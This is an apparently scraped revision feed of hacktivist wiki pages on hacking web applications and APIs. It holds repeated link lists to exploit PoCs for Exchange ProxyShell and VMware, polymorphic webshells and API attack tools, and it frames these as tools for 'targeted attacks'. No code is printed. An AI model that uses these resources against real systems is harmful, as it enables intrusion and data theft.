=== Web Application Hacking ===&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Web Applications]]&lt;br /&gt;
&lt;br /&gt;
=== API Hacking ===&lt;br /&gt;
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.&lt;br /&gt;
&lt;br /&gt;
See [[Hacking APIs]]!&lt;br /&gt;
&lt;br /&gt;
=== IoT Hacking ===&lt;br /&gt;
* https://github.com/V33RU/IoTSecurity101&lt;br /&gt;
&lt;br /&gt;
=== Hacking The Cloud ===&lt;br /&gt;
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.&lt;br /&gt;
&lt;br /&gt;
See [[Cloud Hacking]]&lt;br /&gt;
&lt;br /&gt;
=== Reverse Engineering ===&lt;br /&gt;
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.&lt;br /&gt;
&lt;br /&gt;
See [[Reverse Engineering]]&lt;br /&gt;
&lt;br /&gt;
== Product-specific Hacking ==&lt;br /&gt;
&lt;br /&gt;
=== Google Workspace ===&lt;br /&gt;
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite&lt;br /&gt;
&lt;br /&gt;
=== VMware ===&lt;br /&gt;
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md&lt;br /&gt;
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]&lt;br /&gt;
&lt;br /&gt;
=== Rocket.Chat ===&lt;br /&gt;
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]&lt;br /&gt;
&lt;br /&gt;
=== Microsoft Exchange ===&lt;br /&gt;
&lt;br /&gt;
ProxyLogon is dead. It&#039;s mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.&lt;br /&gt;
&lt;br /&gt;
* ProxyShell:  https://github.com/dmaasland/proxyshell-poc&lt;br /&gt;
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell&lt;br /&gt;
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md&lt;br /&gt;
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94&lt;br /&gt;
* Polymorphic webshells: https://github.com/grCod/poly&lt;br /&gt;
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF&lt;br /&gt;
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain&lt;br /&gt;
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacking_Web_Applications&amp;diff=1736</id>
		<title>Hacking Web Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacking_Web_Applications&amp;diff=1736"/>
		<updated>2024-04-11T17:38:24Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
== Web Application Hacking Methodology - Overview ==&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering - OSINT ===&lt;br /&gt;
&lt;br /&gt;
==== Target Organization ====&lt;br /&gt;
&lt;br /&gt;
===== Basic Information =====&lt;br /&gt;
&lt;br /&gt;
====== Name ======&lt;br /&gt;
&lt;br /&gt;
====== Physical Address ======&lt;br /&gt;
&lt;br /&gt;
====== Employee Count ======&lt;br /&gt;
&lt;br /&gt;
====== Employee Roles ======&lt;br /&gt;
&lt;br /&gt;
====== Target Company TLDs ======&lt;br /&gt;
&lt;br /&gt;
====== Company Acquisitions ======&lt;br /&gt;
&lt;br /&gt;
====== Social Media Presence ======&lt;br /&gt;
&lt;br /&gt;
====== Revenue ======&lt;br /&gt;
&lt;br /&gt;
====== Leadership ======&lt;br /&gt;
&lt;br /&gt;
====== Job Openings ======&lt;br /&gt;
&lt;br /&gt;
==== Organization Employees ====&lt;br /&gt;
&lt;br /&gt;
===== Email Addresses =====&lt;br /&gt;
&lt;br /&gt;
===== Phone Numbers =====&lt;br /&gt;
&lt;br /&gt;
===== Social Media Profiles =====&lt;br /&gt;
&lt;br /&gt;
===== Breached Emails =====&lt;br /&gt;
&lt;br /&gt;
===== Breached Usernames =====&lt;br /&gt;
&lt;br /&gt;
===== Breached Passwords =====&lt;br /&gt;
&lt;br /&gt;
===== Curriculum Vitae Discovery =====&lt;br /&gt;
&lt;br /&gt;
=== Reconnaissance ===&lt;br /&gt;
&lt;br /&gt;
==== Passive ====&lt;br /&gt;
&lt;br /&gt;
===== Dorking =====&lt;br /&gt;
&lt;br /&gt;
===== DNS Enumeration =====&lt;br /&gt;
&lt;br /&gt;
===== Domain Information =====&lt;br /&gt;
&lt;br /&gt;
===== Certificate Information =====&lt;br /&gt;
&lt;br /&gt;
===== Web Stack Technology Identification =====&lt;br /&gt;
&lt;br /&gt;
===== Port Scanning &amp;amp; Service Analysis =====&lt;br /&gt;
&lt;br /&gt;
===== Discovering Historical Data =====&lt;br /&gt;
&lt;br /&gt;
===== ASN Enumeration =====&lt;br /&gt;
&lt;br /&gt;
==== Active ====&lt;br /&gt;
&lt;br /&gt;
===== Security Control Identification =====&lt;br /&gt;
&lt;br /&gt;
===== Port Scanning &amp;amp; Service Enumeration =====&lt;br /&gt;
&lt;br /&gt;
===== Subdomain Enumeration =====&lt;br /&gt;
&lt;br /&gt;
===== Web Stack Technology Identification =====&lt;br /&gt;
&lt;br /&gt;
===== Walking the Application =====&lt;br /&gt;
&lt;br /&gt;
===== Web Crawling =====&lt;br /&gt;
&lt;br /&gt;
===== Source Code Analysis - JavaScript =====&lt;br /&gt;
&lt;br /&gt;
=== Content Discovery ===&lt;br /&gt;
&lt;br /&gt;
===== Subdomain Brute-forcing =====&lt;br /&gt;
&lt;br /&gt;
===== Directory Brute-forcing =====&lt;br /&gt;
&lt;br /&gt;
===== Parameter Fuzzing =====&lt;br /&gt;
&lt;br /&gt;
===== Endpoint Analysis =====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Scanning ===&lt;br /&gt;
&lt;br /&gt;
==== CVE Discovery ====&lt;br /&gt;
&lt;br /&gt;
==== Misconfiguration Discovery ====&lt;br /&gt;
&lt;br /&gt;
==== Common Vulns ====&lt;br /&gt;
&lt;br /&gt;
==== Content Management System &amp;amp; Plugins ====&lt;br /&gt;
&lt;br /&gt;
=== Application Analysis ===&lt;br /&gt;
&lt;br /&gt;
==== Bypassing Security Controls ====&lt;br /&gt;
&lt;br /&gt;
==== Exploit Discovery ====&lt;br /&gt;
&lt;br /&gt;
==== APIs ====&lt;br /&gt;
&lt;br /&gt;
==== Open Redirects ====&lt;br /&gt;
&lt;br /&gt;
==== IDOR ====&lt;br /&gt;
&lt;br /&gt;
==== Authentication ====&lt;br /&gt;
&lt;br /&gt;
==== File Upload Vulnerabilities ====&lt;br /&gt;
&lt;br /&gt;
=== Low Hanging Fruits ===&lt;br /&gt;
&lt;br /&gt;
==== S3 Buckets ====&lt;br /&gt;
&lt;br /&gt;
==== Subdomain Takeover ====&lt;br /&gt;
&lt;br /&gt;
==== Exposed Assets ====&lt;br /&gt;
&lt;br /&gt;
==== Injections ====&lt;br /&gt;
&lt;br /&gt;
==== Default Credentials ====&lt;br /&gt;
&lt;br /&gt;
==== Exposed Secrets ====&lt;br /&gt;
&lt;br /&gt;
=== Tools ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;width:600px&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Tool !! Description !! Link&lt;br /&gt;
|-&lt;br /&gt;
| Example || Example || Example&lt;br /&gt;
|-&lt;br /&gt;
| Example || Example || Example&lt;br /&gt;
|-&lt;br /&gt;
| Example || Example || Example&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacking_Web_Applications&amp;diff=1735</id>
		<title>Hacking Web Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacking_Web_Applications&amp;diff=1735"/>
		<updated>2024-04-11T17:37:00Z</updated>

		<summary type="html">&lt;p&gt;Booda: Implementing Jason Haddix Methodology geared towards hacktivists&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
== Web Application Hacking Methodology - Overview ==&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering - OSINT ===&lt;br /&gt;
&lt;br /&gt;
==== Target Organization ====&lt;br /&gt;
&lt;br /&gt;
===== Basic Information =====&lt;br /&gt;
&lt;br /&gt;
====== Name ======&lt;br /&gt;
&lt;br /&gt;
====== Physical Address ======&lt;br /&gt;
&lt;br /&gt;
====== Employee Count ======&lt;br /&gt;
&lt;br /&gt;
====== Employee Roles ======&lt;br /&gt;
&lt;br /&gt;
====== Target Company TLDs ======&lt;br /&gt;
&lt;br /&gt;
====== Company Acquisitions ======&lt;br /&gt;
&lt;br /&gt;
====== Social Media Presence ======&lt;br /&gt;
&lt;br /&gt;
====== Revenue ======&lt;br /&gt;
&lt;br /&gt;
====== Leadership ======&lt;br /&gt;
&lt;br /&gt;
====== Job Openings ======&lt;br /&gt;
&lt;br /&gt;
==== Organization Employees ====&lt;br /&gt;
&lt;br /&gt;
===== Email Addresses =====&lt;br /&gt;
&lt;br /&gt;
===== Phone Numbers =====&lt;br /&gt;
&lt;br /&gt;
===== Social Media Profiles =====&lt;br /&gt;
&lt;br /&gt;
===== Breached Emails =====&lt;br /&gt;
&lt;br /&gt;
===== Breached Usernames =====&lt;br /&gt;
&lt;br /&gt;
===== Breached Passwords =====&lt;br /&gt;
&lt;br /&gt;
===== Curriculum Vitae Discovery =====&lt;br /&gt;
&lt;br /&gt;
=== Reconnaissance ===&lt;br /&gt;
&lt;br /&gt;
==== Passive ====&lt;br /&gt;
&lt;br /&gt;
===== Dorking =====&lt;br /&gt;
&lt;br /&gt;
===== DNS Enumeration =====&lt;br /&gt;
&lt;br /&gt;
===== Domain Information =====&lt;br /&gt;
&lt;br /&gt;
===== Certificate Information =====&lt;br /&gt;
&lt;br /&gt;
===== Web Stack Technology Identification =====&lt;br /&gt;
&lt;br /&gt;
===== Port Scanning &amp;amp; Service Analysis =====&lt;br /&gt;
&lt;br /&gt;
===== Discovering Historical Data =====&lt;br /&gt;
&lt;br /&gt;
===== ASN Enumeration =====&lt;br /&gt;
&lt;br /&gt;
==== Active ====&lt;br /&gt;
&lt;br /&gt;
===== Security Control Identification =====&lt;br /&gt;
&lt;br /&gt;
===== Port Scanning &amp;amp; Service Enumeration =====&lt;br /&gt;
&lt;br /&gt;
===== Subdomain Enumeration =====&lt;br /&gt;
&lt;br /&gt;
===== Web Stack Technology Identification =====&lt;br /&gt;
&lt;br /&gt;
===== Walking the Application =====&lt;br /&gt;
&lt;br /&gt;
===== Web Crawling =====&lt;br /&gt;
&lt;br /&gt;
===== Source Code Analysis - JavaScript =====&lt;br /&gt;
&lt;br /&gt;
=== Content Discovery ===&lt;br /&gt;
&lt;br /&gt;
===== Subdomain Brute-forcing =====&lt;br /&gt;
&lt;br /&gt;
===== Directory Brute-forcing =====&lt;br /&gt;
&lt;br /&gt;
===== Parameter Fuzzing =====&lt;br /&gt;
&lt;br /&gt;
===== Endpoint Analysis =====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Scanning ===&lt;br /&gt;
&lt;br /&gt;
==== CVE Discovery ====&lt;br /&gt;
&lt;br /&gt;
==== Misconfiguration Discovery ====&lt;br /&gt;
&lt;br /&gt;
==== Common Vulns ====&lt;br /&gt;
&lt;br /&gt;
==== Content Management System &amp;amp; Plugins ====&lt;br /&gt;
&lt;br /&gt;
=== Application Analysis ===&lt;br /&gt;
&lt;br /&gt;
==== Bypassing Security Controls ====&lt;br /&gt;
&lt;br /&gt;
==== Exploit Discovery ====&lt;br /&gt;
&lt;br /&gt;
==== Payloads ====&lt;br /&gt;
&lt;br /&gt;
==== Open Redirects ====&lt;br /&gt;
&lt;br /&gt;
==== IDOR ====&lt;br /&gt;
&lt;br /&gt;
==== Authentication ====&lt;br /&gt;
&lt;br /&gt;
==== File Upload Vulnerabilities ====&lt;br /&gt;
&lt;br /&gt;
=== Low Hanging Fruits ===&lt;br /&gt;
&lt;br /&gt;
==== S3 Buckets ====&lt;br /&gt;
&lt;br /&gt;
==== Subdomain Takeover ====&lt;br /&gt;
&lt;br /&gt;
==== Exposed Assets ====&lt;br /&gt;
&lt;br /&gt;
==== Injections ====&lt;br /&gt;
&lt;br /&gt;
==== Default Credentials ====&lt;br /&gt;
&lt;br /&gt;
==== Exposed Secrets ====&lt;br /&gt;
&lt;br /&gt;
=== Tools ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;width:600px&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Tool !! Description !! Link&lt;br /&gt;
|-&lt;br /&gt;
| Example || Example || Example&lt;br /&gt;
|-&lt;br /&gt;
| Example || Example || Example&lt;br /&gt;
|-&lt;br /&gt;
| Example || Example || Example&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacking_APIs&amp;diff=1734</id>
		<title>Hacking APIs</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacking_APIs&amp;diff=1734"/>
		<updated>2024-03-31T10:38:43Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Tools */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Web Application Programming Interfaces (APIs) make up [https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection 83% of all web traffic] and [https://www.ibm.com/downloads/cas/WMDZOWK6 two thirds of all cloud breaches are due to misconfigured APIs] with developers hard coding credentials and exposing API keys. Organizations are using them more and more to deliver content, handle and transfer data and to implement more functionality into their services and web applications, not to mention APIs have direct back-end database access. Knights [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf white paper] show cases how web APIs can be exploited via [https://owasp.org/www-project-api-security API1:2023 - Broken Object Level Authorization (BOLA)] vulnerability to transfer money in and out of bank accounts and change Visa ATM debit PIN codes. Exploiting web APIs has also been a vector for a lot of [https://www.linkedin.com/pulse/api-exploitation-leading-cause-modern-day-data-gameli-mawudor-phd data breaches].&lt;br /&gt;
&lt;br /&gt;
Currently there is a severe lack of security testing against APIs (mobile APIs especially) from the white hats, not a lot of efforts in testing and protecting APIs and typically organizations &amp;quot;protect&amp;quot; their APIs using WAFs which are ineffective at defending APIs as they are designed to protect web applications and not logic-based exploits. &lt;br /&gt;
&lt;br /&gt;
The top 3 most commonly used web APIs used today (2023) are: Rest, GraphQL and SOAP. Common API data transfer formats are: JSON, XML and YAML. It&#039;s an easier attack vector (for now). Learn how to hack web APIs to facilitate your targeted attacks!&lt;br /&gt;
&lt;br /&gt;
See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon Scanning and Recon], [https://enlacehacktivista.org/index.php?title=Search_Engines_Resources Search Engines],  [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures Initial Access Tactics, techniques and procedures] and a [https://youtu.be/FqnSAa2KmBI hackers methodology] and [https://youtu.be/p4JgIu1mceI recon] as prerequisite&#039;s to hacking APIs.&lt;br /&gt;
&lt;br /&gt;
== Prerequisite reading ==&lt;br /&gt;
* OWASP API Security Top 10: https://owasp.org/www-project-api-security | https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf&lt;br /&gt;
* (Book) Hacking APIs: Breaking Web Application Programming Interfaces&lt;br /&gt;
* (Book) Black Hat GraphQL: Attacking Next Generation APIs&lt;br /&gt;
* API Whitepapers and reports: https://salt.security/resources&lt;br /&gt;
* (Book) Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities (Chapter 24 - API Hacking)&lt;br /&gt;
* SCORCHED EARTH: [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf HACKING BANKS AND CRYPTOCURRENCY EXCHANGES THROUGH THEIR APIS]&lt;br /&gt;
* Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql&lt;br /&gt;
* HackTricks - GraphQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql&lt;br /&gt;
&lt;br /&gt;
== Testing environments ==&lt;br /&gt;
* Completely ridiculous API (crAPI) - Purposefully vulnerable API: https://github.com/OWASP/crAPI&lt;br /&gt;
* Damn Vulnerable GraphQL Application - Intentionally vulnerable GraphQL API: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application&lt;br /&gt;
* OWASP Juice Shop - Insecure web application (uses Rest APIs): https://github.com/juice-shop/juice-shop&lt;br /&gt;
* The Pixi module is a MEAN Stack web app with wildly insecure APIs!: https://github.com/DevSlop/Pixi&lt;br /&gt;
* Vulnerable REST API with OWASP top 10 vulnerabilities for security testing: https://github.com/erev0s/VAmPI&lt;br /&gt;
&lt;br /&gt;
=== Labs ===&lt;br /&gt;
* HackTheBox (HTB) Academy: [https://academy.hackthebox.com/course/preview/web-service--api-attacks Web Service &amp;amp; API Attacks] [Paid]&lt;br /&gt;
* TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop105w OWASP API Security Top 10 - 1] [Paid]&lt;br /&gt;
** TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop10d0 OWASP API Security Top 10 - 2] [Paid]&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
* A collection of API Security tools and resources: https://github.com/arainho/awesome-api-security&lt;br /&gt;
* A comprehensive API hacking framework (A-Z)! MindAPI: https://dsopas.github.io/MindAPI/play&lt;br /&gt;
* Decode JSON Web Tokens (Online): https://jwt.io&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token JWT - JSON Web Token]&lt;br /&gt;
* A toolkit for testing, tweaking and cracking JSON Web Tokens: https://github.com/ticarpi/jwt_tool&lt;br /&gt;
* Obtain GraphQL API schema even if the introspection is disabled: https://github.com/nikitastupin/clairvoyance&lt;br /&gt;
* HTTP parameter discovery suite: https://github.com/s0md3v/Arjun&lt;br /&gt;
* NSE Script for GraphQL Introspection Check: https://github.com/dolevf/nmap-graphql-introspection-nse&lt;br /&gt;
* graphw00f is GraphQL Server Engine Fingerprinting utility: https://github.com/dolevf/graphw00f&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection GraphQL Injection]&lt;br /&gt;
* GraphQL Introspection analyzer: https://github.com/gwen001/graphql-introspection-analyzer&lt;br /&gt;
* If you have found API keys perhaps in a JavaScript file but are not sure how to test their validity use keyhacks: https://github.com/streaak/keyhacks&lt;br /&gt;
&lt;br /&gt;
=== Intercepting proxies ===&lt;br /&gt;
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications, mobile and APIs.&lt;br /&gt;
* https://www.postman.com (API focused)&lt;br /&gt;
* https://portswigger.net/burp (If a WAF is blocking Burpsuite then [https://stackoverflow.com/questions/70129432/how-to-bypass-cloudflare-protection-with-burp try editing your user-agent string])&lt;br /&gt;
* https://www.zaproxy.org | [https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap GraphQL Add-on for ZAP] to exploit GraphQL Introspection.&lt;br /&gt;
&lt;br /&gt;
=== Fuzzing ===&lt;br /&gt;
* https://github.com/assetnote/kiterunner (API focused)&lt;br /&gt;
* https://github.com/ffuf/ffuf&lt;br /&gt;
* https://www.kali.org/tools/wfuzz&lt;br /&gt;
&lt;br /&gt;
==== Wordlists ====&lt;br /&gt;
[https://github.com/assetnote/kiterunner Kiterunner] word lists:&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt&lt;br /&gt;
Web API specific word lists:&lt;br /&gt;
* A list of 3203 common API endpoints and objects designed for fuzzing: https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d&lt;br /&gt;
* A wordlist of API names for web application assessments: https://github.com/chrislockard/api_wordlist&lt;br /&gt;
* A collection of API word lists: https://github.com/hAPI-hacker/Hacking-APIs&lt;br /&gt;
* GraphQL word list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
Although API specific exploitation may require scripting or custom payloads to mass scrape data or exploit logic based vulnerabilities it&#039;s still worth knowing common payloads and exploit tools for web applications: https://enlacehacktivista.org/index.php?title=Exploitation&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacking_APIs&amp;diff=1733</id>
		<title>Hacking APIs</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacking_APIs&amp;diff=1733"/>
		<updated>2024-03-31T10:38:24Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Tools */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Web Application Programming Interfaces (APIs) make up [https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection 83% of all web traffic] and [https://www.ibm.com/downloads/cas/WMDZOWK6 two thirds of all cloud breaches are due to misconfigured APIs] with developers hard coding credentials and exposing API keys. Organizations are using them more and more to deliver content, handle and transfer data and to implement more functionality into their services and web applications, not to mention APIs have direct back-end database access. Knights [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf white paper] show cases how web APIs can be exploited via [https://owasp.org/www-project-api-security API1:2023 - Broken Object Level Authorization (BOLA)] vulnerability to transfer money in and out of bank accounts and change Visa ATM debit PIN codes. Exploiting web APIs has also been a vector for a lot of [https://www.linkedin.com/pulse/api-exploitation-leading-cause-modern-day-data-gameli-mawudor-phd data breaches].&lt;br /&gt;
&lt;br /&gt;
Currently there is a severe lack of security testing against APIs (mobile APIs especially) from the white hats, not a lot of efforts in testing and protecting APIs and typically organizations &amp;quot;protect&amp;quot; their APIs using WAFs which are ineffective at defending APIs as they are designed to protect web applications and not logic-based exploits. &lt;br /&gt;
&lt;br /&gt;
The top 3 most commonly used web APIs used today (2023) are: Rest, GraphQL and SOAP. Common API data transfer formats are: JSON, XML and YAML. It&#039;s an easier attack vector (for now). Learn how to hack web APIs to facilitate your targeted attacks!&lt;br /&gt;
&lt;br /&gt;
See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon Scanning and Recon], [https://enlacehacktivista.org/index.php?title=Search_Engines_Resources Search Engines],  [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures Initial Access Tactics, techniques and procedures] and a [https://youtu.be/FqnSAa2KmBI hackers methodology] and [https://youtu.be/p4JgIu1mceI recon] as prerequisite&#039;s to hacking APIs.&lt;br /&gt;
&lt;br /&gt;
== Prerequisite reading ==&lt;br /&gt;
* OWASP API Security Top 10: https://owasp.org/www-project-api-security | https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf&lt;br /&gt;
* (Book) Hacking APIs: Breaking Web Application Programming Interfaces&lt;br /&gt;
* (Book) Black Hat GraphQL: Attacking Next Generation APIs&lt;br /&gt;
* API Whitepapers and reports: https://salt.security/resources&lt;br /&gt;
* (Book) Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities (Chapter 24 - API Hacking)&lt;br /&gt;
* SCORCHED EARTH: [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf HACKING BANKS AND CRYPTOCURRENCY EXCHANGES THROUGH THEIR APIS]&lt;br /&gt;
* Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql&lt;br /&gt;
* HackTricks - GraphQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql&lt;br /&gt;
&lt;br /&gt;
== Testing environments ==&lt;br /&gt;
* Completely ridiculous API (crAPI) - Purposefully vulnerable API: https://github.com/OWASP/crAPI&lt;br /&gt;
* Damn Vulnerable GraphQL Application - Intentionally vulnerable GraphQL API: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application&lt;br /&gt;
* OWASP Juice Shop - Insecure web application (uses Rest APIs): https://github.com/juice-shop/juice-shop&lt;br /&gt;
* The Pixi module is a MEAN Stack web app with wildly insecure APIs!: https://github.com/DevSlop/Pixi&lt;br /&gt;
* Vulnerable REST API with OWASP top 10 vulnerabilities for security testing: https://github.com/erev0s/VAmPI&lt;br /&gt;
&lt;br /&gt;
=== Labs ===&lt;br /&gt;
* HackTheBox (HTB) Academy: [https://academy.hackthebox.com/course/preview/web-service--api-attacks Web Service &amp;amp; API Attacks] [Paid]&lt;br /&gt;
* TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop105w OWASP API Security Top 10 - 1] [Paid]&lt;br /&gt;
** TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop10d0 OWASP API Security Top 10 - 2] [Paid]&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
* A collection of API Security tools and resources: https://github.com/arainho/awesome-api-security&lt;br /&gt;
* A comprehensive API hacking framework (A-Z)! MindAPI: https://dsopas.github.io/MindAPI/play&lt;br /&gt;
* Decode JSON Web Tokens (Online): https://jwt.io&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token JWT - JSON Web Token]&lt;br /&gt;
* A toolkit for testing, tweaking and cracking JSON Web Tokens: https://github.com/ticarpi/jwt_tool&lt;br /&gt;
* Obtain GraphQL API schema even if the introspection is disabled: https://github.com/nikitastupin/clairvoyance&lt;br /&gt;
* HTTP parameter discovery suite: https://github.com/s0md3v/Arjun&lt;br /&gt;
* NSE Script for GraphQL Introspection Check: https://github.com/dolevf/nmap-graphql-introspection-nse&lt;br /&gt;
* graphw00f is GraphQL Server Engine Fingerprinting utility: https://github.com/dolevf/graphw00f&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection GraphQL Injection]&lt;br /&gt;
* GraphQL Introspection analyzer: https://github.com/gwen001/graphql-introspection-analyzer&lt;br /&gt;
* If you have found API keys perhaps in a JavaScript file but are not sure how to test their validity use keyhacks:https://github.com/streaak/keyhacks&lt;br /&gt;
&lt;br /&gt;
=== Intercepting proxies ===&lt;br /&gt;
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications, mobile and APIs.&lt;br /&gt;
* https://www.postman.com (API focused)&lt;br /&gt;
* https://portswigger.net/burp (If a WAF is blocking Burpsuite then [https://stackoverflow.com/questions/70129432/how-to-bypass-cloudflare-protection-with-burp try editing your user-agent string])&lt;br /&gt;
* https://www.zaproxy.org | [https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap GraphQL Add-on for ZAP] to exploit GraphQL Introspection.&lt;br /&gt;
&lt;br /&gt;
=== Fuzzing ===&lt;br /&gt;
* https://github.com/assetnote/kiterunner (API focused)&lt;br /&gt;
* https://github.com/ffuf/ffuf&lt;br /&gt;
* https://www.kali.org/tools/wfuzz&lt;br /&gt;
&lt;br /&gt;
==== Wordlists ====&lt;br /&gt;
[https://github.com/assetnote/kiterunner Kiterunner] word lists:&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz&lt;br /&gt;
